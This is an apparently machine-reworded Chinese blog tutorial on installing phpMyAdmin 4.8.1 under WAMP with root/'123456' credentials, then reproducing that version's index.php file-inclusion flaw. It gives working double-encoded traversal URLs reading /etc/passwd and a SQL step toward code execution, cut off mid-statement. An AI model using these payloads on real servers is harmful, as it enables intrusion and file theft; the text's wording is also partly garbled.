本文由 发布，转载请注明出处，如有问题请联系我们！ 发布时间: 2021-08-01phpmyadmin怎么打开命令行窗口-phpmyadmin使用教程

一，phpMyAdmin自然环境配备。

PS:前两一部分将简要说明phpmyadmin 4 . 8 . 1版本号的配备全过程。假如阅读者只想要掌握系统漏洞，能够从第三一部分阅读。原谅我~

PhpMyAdmin是一个MySQL数据管理专用工具。安裝此专用工具后，MySQL数据信息能够根据Web立即管理方法，而无需实行DOS命令。特别适合不了解数据库操作指令的数据库查询管理者。该专用工具的安装方法详述如下。

第一步是下载phpMyAdmin 4.8.1。

第二，配备自然环境。在libraries文件目录中开启config.default.php文件，先后寻找下列新项目，并依据表明开展配备。

改动MySQL登录名和登陆密码，phpMyAdmin应用MySQL默认设置登录名root，设置密码为“123456”。

/** * MySQL user * * @global string $cfg['Servers'][$i]['user'] */$cfg['Servers'][$i]['user'] = 'root';/** * MySQL password (only needed with 'config' auth_type) * * @global string $cfg['Servers'][$i]['password'] */$cfg['Servers'][$i]['password'] = '123456';

验证方法设定为“cookie”，登陆phpMyAdmin时必须登录名和登陆密码开展验证。有四种方式可选择:cookie，http，登陆和配备。

/** * Authentication method (valid choices: config, http, signon or cookie) * * @global string $cfg['Servers'][$i]['auth_type'] */$cfg['Servers'][$i]['auth_type'] = 'cookie';

第三步:运作WAMP手机软件，用4.8.1版本号更换WAMP的phpMyAdmin。

如下图所显示开展拆换:

运作Apache和MySQL，如下图所显示。

1:在我们键入登录名“root”和登陆密码“123456”时，大家也许会汇报不正确“MySQL _ real _ connect():(hy 000/1045):回绝客户“root”@“localhost”(应用登陆密码:yes)的浏览。提醒是不正确1045，告知大家不正确是由于沒有访问限制，因此拒绝访问，关键因素是登录名相匹配的密码错误。

第四步是查验环境变量中的服务器，登录名和登陆密码，确定哪些信息内容与MySQL网络服务器管理人员得出的信息内容一致。设定controluser和controlpass。

/** * MySQL control user settings (this user must have read-only * access to the "mysql/user" and "mysql/db" tables). The controluser is also * used for all relational features (pmadb) * * @global string $cfg['Servers'][$i]['controluser'] */$cfg['Servers'][$i]['controluser'] = 'root';/** * MySQL control user settings (this user must have read-only * access to the "mysql/user" and "mysql/db" tables). The controluser is also * used for all relational features (pmadb) * * @global string $cfg['Servers'][$i]['controlpass'] */$cfg['Servers'][$i]['controlpass'] = '123456';

第五步是改动“config.sample.inc.php”(或config.sample.inc.php)文档的內容。

设定controluser和controlpass值。

改动如下所示:

$cfg['Servers'][$i]['controluser'] = 'root';$cfg['Servers'][$i]['controlpass'] = '123456';$cfg['Servers'][$i]['user'] = 'root';$cfg['Servers'][$i]['password'] = '123456';第六步，登陆phpMyAdmin，键入“root”和“123456”进到数据管理主界面。

二.phpMyAdmin的基本上使用方法。

随后大家试着用phpMyAdmin搭建一个简洁的网址。

第一步是建立一个数据库查询。

次之，建立数据分析表学员，点一下实行。

第三步:设定报表的字段名，包含id，登录名和登陆密码。

第四步，查询大家建立的学员数据分析表。

第五步，插进数据信息并查看。

INSERT INTO `student`(`id`, `username`, `password`) VALUES ('1', 'yangxiuzhang','6666666');INSERT INTO `student`(`id`, `username`, `password`) VALUES ('2', 'Eastmountain','123456');这时，数据信息表明如下图所显示:

第六步:撰写PHP编码来表明大家数据库查询中的內容。

详细地址:http://localhost:8088/20200110 . PHP。

結果如下图所显示:

假如必须查询配备信息内容，能够应用“phpinfo()”涵数来完成。

数据显示PHP的配备信息内容如下图所显示。

到此，大家的自然环境早已取得成功构建。下面，使我们逐渐表述phpMyAdmin的系统漏洞。许多时尚博主将会怪异，为何要花这么多時间表述自然环境的搭建，缘故有二！一方面，创作者从零开始学习培训，根据自然环境基本建设重现这一系统漏洞；另一方面，照料新手，期待文章内容的试验能够根据浅显易懂的流程完成，也期待安全圈的大神们不要笑，嘿嘿~她们全是一点一点成长的。

Iii .phpMyAdmin系统漏洞再次发生。

缘故:phpmyadmin 4 . 8 . 1版的index.php存有文件包含系统漏洞，能够根据二次编码绕开过虑。

第一步是依据这一版本号的CVE系统漏洞结构URL，在index.php之后加上內容，例如表明/etc/passwd的详细资料。

/* 方式一 */http://localhost:8088/phpmyadmin/index.php?target=db_sql.php%3f/../../../../../../../../etc/passwd/* 方式二 */http://localhost:8088/phpmyadmin/index.php?target=db_datadict.php%3f/../../../../../../../../../Windows/DATE.ini

第二步是根据文件目录解析xml包括随意文档。

第三，实行SQL句子数据库查询途径。結果是:C:xampmysqldata。

show global variables like "�tadir%";第四步是将php代码载入数据库查询。建立数据库rce和表rce，并插进php代码。

CREATE DATABASE rce;use rce;CREATE TABLE rce(code varchar(100));INSERT INTO rce(code) VALUES("